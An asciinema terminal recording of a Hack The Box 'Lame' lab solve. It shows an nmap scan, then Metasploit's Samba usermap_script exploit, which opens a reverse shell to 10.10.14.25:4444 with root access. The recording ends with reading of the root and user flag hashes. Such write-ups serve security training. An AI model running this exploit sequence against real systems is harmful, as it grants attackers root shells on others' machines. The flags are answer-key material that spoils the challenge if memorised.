{"version": 2, "width": 138, "height": 28, "timestamp": 1561414255, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.088229, "o", "\u001b]0;root@kali: ~/hackthebox/machines/lame\u0007\u001b[01;31mroot@kali\u001b[00m:\u001b[01;34m~/hackthebox/machines/lame\u001b[00m# "]
[0.963785, "o", "n"]
[1.163485, "o", "m"]
[1.258999, "o", "a"]
[1.381783, "o", "p"]
[1.476198, "o", " "]
[2.156621, "o", "-"]
[2.387389, "o", "F"]
[2.515825, "o", " "]
[2.868951, "o", "1"]
[2.964476, "o", "0"]
[3.26025, "o", "."]
[3.493076, "o", "1"]
[3.629986, "o", "0"]
[3.901707, "o", "."]
[4.029358, "o", "1"]
[4.222497, "o", "0"]
[4.453562, "o", "."]
[4.708596, "o", "3"]
[4.988204, "o", " "]
[5.180418, "o", "-"]
[5.878438, "o", "P"]
[6.454729, "o", "n"]
[6.806454, "o", "\r\n"]
[6.836652, "o", "Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-25 00:11 CEST"]
[6.837612, "o", "\r\n"]
[9.206511, "o", "Nmap scan report for 10.10.10.3 (10.10.10.3)"]
[9.207577, "o", "\r\n"]
[9.209164, "o", "Host is up (0.064s latency)."]
[9.210077, "o", "\r\n"]
[9.211225, "o", "Not shown: 96 filtered ports"]
[9.212206, "o", "\r\n"]
[9.213111, "o", "PORT    STATE SERVICE"]
[9.213962, "o", "\r\n"]
[9.214776, "o", "21/tcp  open  ftp"]
[9.215505, "o", "\r\n"]
[9.216154, "o", "22/tcp  open  ssh"]
[9.216712, "o", "\r\n"]
[9.217273, "o", "139/tcp open  netbios-ssn"]
[9.217878, "o", "\r\n"]
[9.218469, "o", "445/tcp open  microsoft-ds"]
[9.218959, "o", "\r\n"]
[9.21964, "o", "\r\n"]
[9.220352, "o", "Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds"]
[9.220717, "o", "\r\n"]
[9.236032, "o", "\u001b]0;root@kali: ~/hackthebox/machines/lame\u0007\u001b[01;31mroot@kali\u001b[00m:\u001b[01;34m~/hackthebox/machines/lame\u001b[00m# "]
[10.200313, "o", "m"]
[10.281458, "o", "s"]
[10.727729, "o", "f"]
[10.93736, "o", "c"]
[11.033173, "o", "o"]
[11.120935, "o", "n"]
[11.17676, "o", "s"]
[11.264018, "o", "o"]
[11.456284, "o", "l"]
[11.513231, "o", "e"]
[11.776946, "o", "\r\n"]
[17.454714, "o", "[*] Starting the Metasploit Framework console.../\r"]
[17.556069, "o", "[*] Starting the Metasploit Framework console...-\r"]
[17.656398, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[17.757977, "o", "[*] starting the Metasploit Framework console...|\r"]
[17.810768, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***"]
[17.811112, "o", "\r\n"]
[17.811727, "o", "\u001b[1m\u001b[31m[-]\u001b[0m * WARNING: No database support: could not connect to server: Connection refused"]
[17.811938, "o", "\r\n"]
[17.812113, "o", "\t"]
[17.812311, "o", "Is the server running on host \"localhost\" (::1) and accepting"]
[17.812536, "o", "\r\n"]
[17.812703, "o", "\t"]
[17.812937, "o", "TCP/IP connections on port 5432?"]
[17.813143, "o", "\r\n"]
[17.813334, "o", "could not connect to server: Connection refused"]
[17.813488, "o", "\r\n"]
[17.813595, "o", "\t"]
[17.813744, "o", "Is the server running on host \"localhost\" (127.0.0.1) and accepting"]
[17.813868, "o", "\r\n"]
[17.81398, "o", "\t"]
[17.814304, "o", "TCP/IP connections on port 5432?"]
[17.814502, "o", "\r\n"]
[17.814845, "o", "\r\n"]
[17.815495, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***"]
[17.815687, "o", "\r\n"]
[17.971385, "o", "[*] STarting the Metasploit Framework console.../\r"]
[18.07754, "o", "[*] StArting the Metasploit Framework console...-\r"]
[18.177986, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[18.278166, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[18.378714, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[18.478831, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[18.579492, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[18.679979, "o", "[*] Starting the Metasploit Framework console...|\r"]
[18.780111, "o", "[*] Starting The Metasploit Framework console.../\r"]
[18.880264, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[18.980749, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[19.080857, "o", "[*] Starting the Metasploit Framework console...|\r"]
[19.181405, "o", "[*] Starting the metasploit Framework console.../\r"]
[19.281483, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[19.381939, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[19.482377, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[19.583242, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[19.683831, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[19.78438, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[19.884521, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[19.985095, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[20.08563, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[20.186239, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[20.286353, "o", "[*] Starting the Metasploit framework console...|\r"]
[20.386914, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[20.48701, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[20.587547, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[20.708052, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[20.808229, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[20.919858, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[21.020196, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[21.120736, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[21.221328, "o", "[*] Starting the Metasploit Framework console.../\r"]
[21.32192, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[21.422144, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[21.52295, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[21.623386, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[21.723728, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[21.825031, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[21.925345, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[22.025892, "o", "[*] Starting the Metasploit Framework console.../\r"]
[22.126466, "o", "[*] Starting the Metasploit Framework console...-\r"]
[22.227073, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[22.327662, "o", "[*] Starting the Metasploit Framework console...|\r"]
[22.38416, "o", "\r                                                  "]
[22.384451, "o", "\r\n"]
[22.385062, "o", "\u001b[0m"]
[22.386947, "o", "\u001b[36m\u001b[0m\r"]
[22.387153, "o", "\r\n"]
[22.38732, "o", "\u001b[35m     .~+P``````-o+:.                                      -o+:.\u001b[0m\r"]
[22.387541, "o", "\r\n"]
[22.387717, "o", "\u001b[35m.+oooyysyyssyyssyddh++os-`````                        ```````````````          `\u001b[0m\r"]
[22.387961, "o", "\r\n"]
[22.38812, "o", "\u001b[35m+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o\u001b[0m\r"]
[22.388279, "o", "\r\n"]
[22.388431, "o", "\u001b[35m++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy\u001b[0m\r"]
[22.388598, "o", "\r\n"]
[22.388752, "o", "\u001b[35m--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///\u001b[0m\r"]
[22.388904, "o", "\r\n"]
[22.389057, "o", "\u001b[35m                                `...............`              `...-/////...`\u001b[0m\r"]
[22.389211, "o", "\r\n"]
[22.389363, "o", "\u001b[0m\r"]
[22.389515, "o", "\r\n"]
[22.389686, "o", "\u001b[0m\r"]
[22.389841, "o", "\r\n"]
[22.390051, "o", "\u001b[37m                                  .::::::::::-.                     .::::::-\u001b[0m\r"]
[22.390245, "o", "\r\n"]
[22.390402, "o", "\u001b[37m                                .hmMMMMMMMMMMNddds\\...//M\\\\.../hddddmMMMMMMNo\u001b[0m\r"]
[22.390644, "o", "\r\n"]
[22.390882, "o", "\u001b[37m                                 :Nm-/NMMMMMMMMMMMMM\u001b[34m$$\u001b[37mNMMMMm\u001b[34m&&\u001b[37mMMMMMMMMMMMMMMy\u001b[0m\r"]
[22.391036, "o", "\r\n"]
[22.391188, "o", "\u001b[37m                                 .sm/`-yMMMMMMMMMMMM\u001b[34m$$\u001b[37mMMMMMN\u001b[34m&&\u001b[37mMMMMMMMMMMMMMh`\u001b[0m\r"]
[22.391342, "o", "\r\n"]
[22.391521, "o", "\u001b[37m                                  -Nd`  :MMMMMMMMMMM\u001b[34m$$\u001b[37mMMMMMN\u001b[34m&&\u001b[37mMMMMMMMMMMMMh`\u001b[0m\r"]
[22.391749, "o", "\r\n"]
[22.392003, "o", "\u001b[37m                                   -Nh` .yMMMMMMMMMM\u001b[34m$$\u001b[37mMMMMMN\u001b[34m&&\u001b[37mMMMMMMMMMMMm/\u001b[0m\r"]
[22.392304, "o", "\r\n"]
[22.392469, "o", "\u001b[37m    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM\u001b[34m$$\u001b[37mMMMMMN\u001b[34m&&\u001b[37mMMMMMMMMMMm/\u001b[0m\r"]
[22.392628, "o", "\r\n"]
[22.392782, "o", "\u001b[37m      .yNmMMh\u001b[2;31m//\u001b[37m+syysso-``````       -mh` :MMMMMMMMMM\u001b[34m$$\u001b[37mMMMMMN\u001b[34m&&\u001b[37mMMMMMMMMMMd\u001b[0m\r"]
[22.392946, "o", "\r\n"]
[22.393098, "o", "\u001b[37m    .shMMMMN\u001b[2;31m//\u001b[37mdmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/\u001b[0m\r"]
[22.3933, "o", "\r\n"]
[22.393466, "o", "\u001b[37m    `///omh\u001b[2;31m//\u001b[37mdMMMMMMMMMMMMMMMN/\u001b[2;31m:::::/+ooso--/ydh//+s+/ossssso:--syN///os:\u001b[0m\r"]
[22.39362, "o", "\r\n"]
[22.393941, "o", "\u001b[37m          /MMMMMMMMMMMMMMMMMMd.     \u001b[2;31m`/++-.-yy/\u001b[37m...\u001b[2;31mosydh/-+oo:-`o//\u001b[37m...\u001b[2;31moyodh+\u001b[0m\r"]
[22.394099, "o", "\r\n"]
[22.394274, "o", "\u001b[37m          -hMMmssddd+:dMMmNMMh.     \u001b[2;31m`.-=mmk.\u001b[37m//^^^\\\\\u001b[2;31m.^^`:++:^^o:\u001b[37m//^^^\\\\\u001b[2;31m`::\u001b[0m\r"]
[22.394442, "o", "\r\n"]
[22.394598, "o", "\u001b[37m          .sMMmo.    -dMd--:mN/`           \u001b[37m||--X--||\u001b[0m          \u001b[2;31m\u001b[37m||--X--||\u001b[0m\r"]
[22.394751, "o", "\r\n"]
[22.394903, "o", "\u001b[37m........../yddy/:...+hmo-...hdd:............\u001b[37m\\\\=v=//\u001b[0m............\u001b[2;31m\u001b[37m\\\\=v=//\u001b[0m.........\r"]
[22.395128, "o", "\r\n"]
[22.395281, "o", "\u001b[32m==========================="]
[22.395512, "o", "=====================================================\u001b[0m\r"]
[22.395722, "o", "\r\n"]
[22.396025, "o", "\u001b[32m=====================\u001b[37m+--------------------------------+\u001b[32m=========================\u001b[0m\r"]
[22.39618, "o", "\r\n"]
[22.396278, "o", "\u001b[32m=====================\u001b[37m| Session one died of dysentery. |\u001b[32m=========================\u001b[0m\r"]
[22.396388, "o", "\r\n"]
[22.396483, "o", "\u001b[32m=====================\u001b[37m+--------------------------------+\u001b[32m=========================\u001b[0m\r"]
[22.396577, "o", "\r\n"]
[22.396669, "o", "\u001b[32m================================================================================\u001b[0m\r"]
[22.396762, "o", "\r\n"]
[22.396915, "o", "\u001b[0m\r"]
[22.397099, "o", "\r\n"]
[22.397193, "o", "\u001b[0m                     \u001b[32mPress ENTER to size up the situation\u001b[0m\r"]
[22.397286, "o", "\r\n"]
[22.397478, "o", "\u001b[0m\r"]
[22.397659, "o", "\r\n"]
[22.397708, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.397765, "o", "\r\n"]
[22.397881, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.397924, "o", "\r\n"]
[22.397964, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.398003, "o", "\r\n"]
[22.398043, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.398082, "o", "\r\n"]
[22.398121, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.398161, "o", "\r\n"]
[22.398201, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.39824, "o", "\r\n"]
[22.39828, "o", "\u001b[37m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\u001b[0m\r"]
[22.398379, "o", "\r\n"]
[22.398427, "o", "\u001b[0m\r"]
[22.398467, "o", "\r\n"]
[22.398506, "o", "\u001b[0m                        \u001b[37mPress SPACE BAR to continue\u001b[0m\r"]
[22.398545, "o", "\r\n"]
[22.398584, "o", "\u001b[0m\r"]
[22.398624, "o", "\r\n"]
[22.398679, "o", "\u001b[0m"]
[22.398798, "o", "\r\n"]
[22.398839, "o", "\r\n"]
[22.398879, "o", "       =[ \u001b[33mmetasploit v5.0.5-dev\u001b[0m                           ]"]
[22.398919, "o", "\r\n"]
[22.398958, "o", "+ -- --=[ 1856 exploits - 1049 auxiliary - 325 post       ]"]
[22.398998, "o", "\r\n"]
[22.399037, "o", "+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]"]
[22.400076, "o", "\r\n"]
[22.400127, "o", "+ -- --=[ 2 evasion                                       ]"]
[22.400167, "o", "\r\n"]
[22.400207, "o", "\r\n"]
[22.461845, "o", "\u001b[?1034h"]
[22.487028, "o", "\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[23.206673, "o", "s"]
[23.268841, "o", "e"]
[23.412675, "o", "a"]
[23.525532, "o", "r"]
[23.741425, "o", "c"]
[23.861837, "o", "h"]
[23.996991, "o", " "]
[24.165255, "o", "u"]
[24.253661, "o", "s"]
[24.341549, "o", "e"]
[24.422912, "o", "r"]
[24.661865, "o", "m"]
[24.82573, "o", "a"]
[24.951315, "o", "p"]
[25.294028, "o", "_"]
[25.510955, "o", "s"]
[25.654302, "o", "c"]
[25.831419, "o", "r"]
[25.934677, "o", "i"]
[26.136333, "o", "p"]
[26.273794, "o", "t"]
[26.424264, "o", "\r"]
[26.425324, "o", "\r\n"]
[26.447393, "o", "\u001b[0m"]
[26.56652, "o", "\r\n"]
[26.566812, "o", "Matching Modules"]
[26.566984, "o", "\r\n"]
[26.567144, "o", "================"]
[26.567298, "o", "\r\n"]
[26.567496, "o", "\r\n"]
[26.567746, "o", "   Name                                Disclosure Date  Rank       Check  Description"]
[26.567901, "o", "\r\n"]
[26.568053, "o", "   ----                                ---------------  ----       -----  -----------"]
[26.568206, "o", "\r\n"]
[26.568357, "o", "   exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba \"username map script\" Command Execution"]
[26.568489, "o", "\r\n"]
[26.568602, "o", "\r\n"]
[26.568712, "o", "\r\n"]
[26.595992, "o", "\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[29.937364, "o", "u"]
[30.008559, "o", "s"]
[30.079961, "o", "e"]
[30.289526, "o", " "]
[30.705848, "o", "e"]
[30.707572, "o", "x"]
[30.709115, "o", "p"]
[30.710731, "o", "l"]
[30.712419, "o", "o"]
[30.714713, "o", "i"]
[30.716523, "o", "t"]
[30.718487, "o", "/"]
[30.720307, "o", "m"]
[30.722262, "o", "u"]
[30.724208, "o", "l"]
[30.726278, "o", "t"]
[30.728369, "o", "i"]
[30.730575, "o", "/"]
[30.732009, "o", "s"]
[30.732896, "o", "a"]
[30.733928, "o", "m"]
[30.735031, "o", "b"]
[30.735838, "o", "a"]
[30.736676, "o", "/"]
[30.737724, "o", "u"]
[30.738696, "o", "s"]
[30.739581, "o", "e"]
[30.740647, "o", "r"]
[30.741552, "o", "m"]
[30.742557, "o", "a"]
[30.74355, "o", "p"]
[30.744576, "o", "_"]
[30.745671, "o", "s"]
[30.746749, "o", "c"]
[30.747882, "o", "r"]
[30.748842, "o", "i"]
[30.749872, "o", "p"]
[30.750938, "o", "t"]
[31.096189, "o", "\r"]
[31.097331, "o", "\r\n"]
[31.118277, "o", "\u001b[0m"]
[31.185712, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[32.187458, "o", "s"]
[32.274712, "o", "e"]
[32.527546, "o", "t"]
[32.658819, "o", " "]
[32.95509, "o", "R"]
[33.201375, "o", "H"]
[33.273754, "o", "O"]
[33.355569, "o", "S"]
[33.435842, "o", "T"]
[33.964029, "o", "S"]
[34.050673, "o", " "]
[34.404152, "o", "1"]
[34.492789, "o", "0"]
[34.739319, "o", "."]
[34.86095, "o", "1"]
[35.023164, "o", "0"]
[35.236535, "o", "."]
[35.36464, "o", "1"]
[35.508767, "o", "0"]
[35.723735, "o", "."]
[36.076364, "o", "3"]
[36.210042, "o", "\r"]
[36.211218, "o", "\r\n"]
[36.232367, "o", "\u001b[0m"]
[36.23653, "o", "RHOSTS => 10.10.10.3"]
[36.237328, "o", "\r\n"]
[36.286423, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[37.341902, "o", "e"]
[37.548463, "o", "x"]
[37.627945, "o", "p"]
[37.820156, "o", "l"]
[38.005442, "o", "o"]
[38.109838, "o", "i"]
[38.197742, "o", "t"]
[38.381681, "o", "\r"]
[38.382794, "o", "\r\n"]
[38.403096, "o", "\u001b[0m"]
[42.179359, "o", "\r\n"]
[42.180077, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started reverse TCP double handler on 10.10.14.25:4444 "]
[42.180276, "o", "\r\n"]
[42.462298, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Accepted the first client connection..."]
[42.463404, "o", "\r\n"]
[42.466293, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Accepted the second client connection..."]
[42.467206, "o", "\r\n"]
[42.721723, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command: echo ita9BB7Tn4T2yM6e;"]
[42.722836, "o", "\r\n"]
[42.725287, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Writing to socket A"]
[42.72604, "o", "\r\n"]
[42.729463, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Writing to socket B"]
[42.730238, "o", "\r\n"]
[42.733188, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Reading from sockets..."]
[42.733944, "o", "\r\n"]
[43.73809, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Reading from socket B"]
[43.739199, "o", "\r\n"]
[43.741877, "o", "\u001b[1m\u001b[34m[*]\u001b[0m B: \"ita9BB7Tn4T2yM6e\\r\\n\""]
[43.742791, "o", "\r\n"]
[43.745388, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Matching..."]
[43.746143, "o", "\r\n"]
[43.749106, "o", "\u001b[1m\u001b[34m[*]\u001b[0m A is input..."]
[43.750198, "o", "\r\n"]
[43.963049, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:47026) at 2019-06-25 00:11:39 +0200"]
[43.964009, "o", "\r\n"]
[43.978911, "o", "\r\n"]
[43.981296, "o", "\u001b[0m"]
[46.533782, "o", "i"]
[46.5635, "o", "d"]
[46.764209, "o", "\r\n"]
[46.844468, "o", "uid=0(root) gid=0(root)\r"]
[46.845477, "o", "\r\n"]
[47.324645, "o", "c"]
[47.405323, "o", "a"]
[47.582086, "o", "t"]
[47.670122, "o", " "]
[47.977165, "o", "/"]
[48.158512, "o", "R"]
[48.781856, "o", "\b \b"]
[48.910553, "o", "r"]
[49.005723, "o", "o"]
[49.181386, "o", "o"]
[49.286669, "o", "t"]
[49.774197, "o", "/"]
[50.710263, "o", "^"]
[51.102745, "o", "\b \b"]
[51.550916, "o", "*"]
[52.04828, "o", "."]
[52.263245, "o", "t"]
[52.456481, "o", "x"]
[52.58458, "o", "t"]
[52.736897, "o", "\r\n"]
[52.806855, "o", "92caac3be140ef409e45721348a4e9df\r"]
[52.807456, "o", "\r\n"]
[53.407294, "o", "c"]
[53.479982, "o", "a"]
[53.680079, "o", "t"]
[53.785892, "o", " "]
[54.129087, "o", "/"]
[54.488197, "o", "h"]
[54.552756, "o", "o"]
[54.71264, "o", "m"]
[54.792639, "o", "e"]
[55.161798, "o", "/"]
[55.528739, "o", "*"]
[56.016942, "o", "."]
[56.346102, "o", "\b \b"]
[56.76265, "o", "/"]
[57.345816, "o", "*"]
[57.667048, "o", "."]
[57.800975, "o", "t"]
[57.985885, "o", "x"]
[58.163862, "o", "t"]
[58.330983, "o", "\r\n"]
[58.397254, "o", "69454a937d94f5f0225ea00acd2e84c5\r"]
[58.397955, "o", "\r\n"]
[62.486883, "o", "^C"]
[62.489571, "o", "\r\n"]
[62.490397, "o", "Abort session 1? [y/N]  "]
[63.375932, "o", "y"]
[63.777326, "o", "\r\n"]
[63.778652, "o", "\"\""]
[63.779614, "o", "\r\n"]
[63.782007, "o", "\r\n"]
[63.785282, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.3 - Command shell session 1 closed.  Reason: User exit"]
[63.785999, "o", "\r\n"]
[63.837919, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[64.178311, "o", "e"]
[64.329254, "o", "x"]
[64.425148, "o", "i"]
[64.586144, "o", "t"]
[64.704587, "o", "\r"]
[64.705577, "o", "\r\n"]
[64.726164, "o", "\u001b[0m"]
[64.780052, "o", "\u001b]0;root@kali: ~/hackthebox/machines/lame\u0007\u001b[01;31mroot@kali\u001b[00m:\u001b[01;34m~/hackthebox/machines/lame\u001b[00m# "]
[65.392628, "o", "e"]
[65.561502, "o", "x"]
[65.656687, "o", "i"]
[65.761019, "o", "t"]
[65.891168, "o", "\r\nexit\r\n"]
